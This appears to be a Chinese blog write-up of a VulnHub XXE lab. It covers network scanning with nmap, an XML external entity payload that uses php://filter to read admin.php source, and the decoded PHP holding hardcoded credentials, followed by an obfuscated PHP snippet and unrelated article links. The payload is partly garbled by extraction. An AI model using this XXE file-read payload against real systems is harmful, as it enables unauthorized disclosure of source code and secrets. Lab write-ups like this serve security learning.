• vulnhub-xxe lab: 1


    ifconfig

    nmap 192.168.61.0/24

    找到192.168.61.145

     目录扫描(御剑

    192.168.61.145/xxe

    192.168.61.145/admin.php

    无法访问,但是robots.txt里面写的应该不会是无效网站,所以可能是被拒绝访问了

     抓xxe的包

    可以发现是用xml写的,试一下有没有漏洞

    这里用php://filter而不用 file:// 是因为php://filter可以直接跟相对路径,而 file:// 要跟绝对路径

    在192.168.61.145这个页面下,xxe和 admin.php是知道的,但是绝对路径不知道

    1. "1.0" encoding="UTF-8"?>
    2. ANY [
    3. test SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
    4. ]>
    5. <root><name>&test;name><password>1password>root>

     解码

    1. <?php
    2. session_start();
    3. ?>
    4. <html lang = "en">
    5. <head>
    6. <title>admin</title>
    7. <link href = "css/bootstrap.min.css" rel = "stylesheet">
    8. <style>
    9. body {
    10. padding-top: 40px;
    11. padding-bottom: 40px;
    12. background-color: #ADABAB;
    13. }
    14. .form-signin {
    15. max-width: 330px;
    16. padding: 15px;
    17. margin: 0 auto;
    18. color: #017572;
    19. }
    20. .form-signin .form-signin-heading,
    21. .form-signin .checkbox {
    22. margin-bottom: 10px;
    23. }
    24. .form-signin .checkbox {
    25. font-weight: normal;
    26. }
    27. .form-signin .form-control {
    28. position: relative;
    29. height: auto;
    30. -webkit-box-sizing: border-box;
    31. -moz-box-sizing: border-box;
    32. box-sizing: border-box;
    33. padding: 10px;
    34. font-size: 16px;
    35. }
    36. .form-signin .form-control:focus {
    37. z-index: 2;
    38. }
    39. .form-signin input[type="email"] {
    40. margin-bottom: -1px;
    41. border-bottom-right-radius: 0;
    42. border-bottom-left-radius: 0;
    43. border-color:#017572;
    44. }
    45. .form-signin input[type="password"] {
    46. margin-bottom: 10px;
    47. border-top-left-radius: 0;
    48. border-top-right-radius: 0;
    49. border-color:#017572;
    50. }
    51. h2{
    52. text-align: center;
    53. color: #017572;
    54. }
    55. </style>
    56. </head>
    57. <body>
    58. <h2>Enter Username and Password</h2>
    59. <div class = "container form-signin">
    60. <?php
    61. $msg = '';
    62. if (isset($_POST['login']) && !empty($_POST['username'])
    63. && !empty($_POST['password'])) {
    64. if ($_POST['username'] == 'administhebest' &&
    65. md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
    66. $_SESSION['valid'] = true;
    67. $_SESSION['timeout'] = time();
    68. $_SESSION['username'] = 'administhebest';
    69. echo "You have entered valid use name and password
      "
      ;
    70. $flag = "Here is the Flag";
    71. echo $flag;
    72. }else {
    73. $msg = 'Maybe Later';
    74. }
    75. }
    76. ?>
    77. </div> <!-- W00t/W00t -->
    78. <div class = "container">
    79. <form class = "form-signin" role = "form"
    80. action = "
    81. ?>" method = "post">
    82. <h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
    83. <input type = "text" class = "form-control"
    84. name = "username"
    85. required autofocus></br>
    86. <input type = "password" class = "form-control"
    87. name = "password" required>
    88. <button class = "btn btn-lg btn-primary btn-block" type = "submit"
    89. name = "login">Login</button>
    90. </form>
    91. Click here to clean <a href = "adminlog.php" tite = "Logout">Session.
    92. </div>
    93. </body>
    94. </html>

    账号密码都出来了 

     

    administhebest

    admin@123

    错了,试了几遍都没用,看来要找别的路

    继续看代码,可以看到这个,这也是账号密码正确后会进行的东西 

     查看 flagmeout.php 的源代码

     base64解密

    1. $flag = "";
    2. echo $flag;
    3. ?>

    目测base32解密

    再解密

    还有 

     

    $_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];=+_;=========++[];++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;++;$__('$_="'.$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....$___....'"');$__($_);

    emm,看着有点像php,卡了,忘记可以运行代码了

     不知道为什么会错,按理说这里应该就结束了

  • 相关阅读:
    【无标题】
    大数据分析与可视化课题
    C语言:动态内存(一篇拿捏动态内存!)
    java计算机毕业设计高校学生体温管理系统源码+mysql数据库+系统+lw文档+部署
    QT中表格控件使用
    Settings属性读写
    json数据刨根究底
    【leetcode】【剑指offer Ⅱ】066. 单词之和
    信钰证券:6G概念强势拉升,通宇通讯、世嘉科技涨停,硕贝德等走高
    .NET下数据库的负载均衡(有趣实验)(续)
  • 原文地址:https://blog.csdn.net/m0_62094846/article/details/126910484